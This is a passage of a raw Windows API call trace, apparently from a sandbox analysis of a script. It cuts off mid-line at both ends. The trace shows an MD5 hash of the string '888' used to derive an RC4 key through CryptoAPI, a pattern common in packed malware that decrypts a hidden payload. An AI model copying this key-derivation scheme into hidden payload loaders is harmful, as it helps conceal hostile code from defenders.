wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0168.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0168.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0168.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0168.873] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0168.873] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.874] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.874] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.874] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0168.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0168.874] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.874] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.874] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0168.874] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.874] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0168.874] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0168.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0168.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0168.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0168.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7000, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0168.875] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bec48) returned 1 [0168.875] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.875] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.875] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0168.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.875] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0168.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.875] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.876] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.876] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.876] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.876] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.876] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0168.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.876] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0168.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.876] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.876] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.877] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.877] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.877] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.877] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.877] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.877] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.877] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.877] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.877] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.877] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.877] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.877] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.878] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.878] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.878] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.878] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.878] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0168.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0168.878] CryptCreateHash (in: hProv=0x9bec48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0168.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0168.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0168.878] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0168.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0168.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0168.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.878] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0168.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaadb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0168.879] CryptHashData (hHash=0x9e1cf8, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0168.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.879] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0168.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaabd0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0168.880] CryptDeriveKey (in: hProv=0x9bec48, Algid=0x6601, hBaseData=0x9e1cf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1fb8) returned 1 [0168.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.880] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.880] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0168.880] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.880] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0168.880] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0168.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0168.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7140, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0168.880] CryptDestroyHash (hHash=0x9e1cf8) returned 1 [0168.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0168.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0168.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0168.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0168.881] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0168.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0168.881] PeekMessageW (in: lpMsg=0x8cf708, 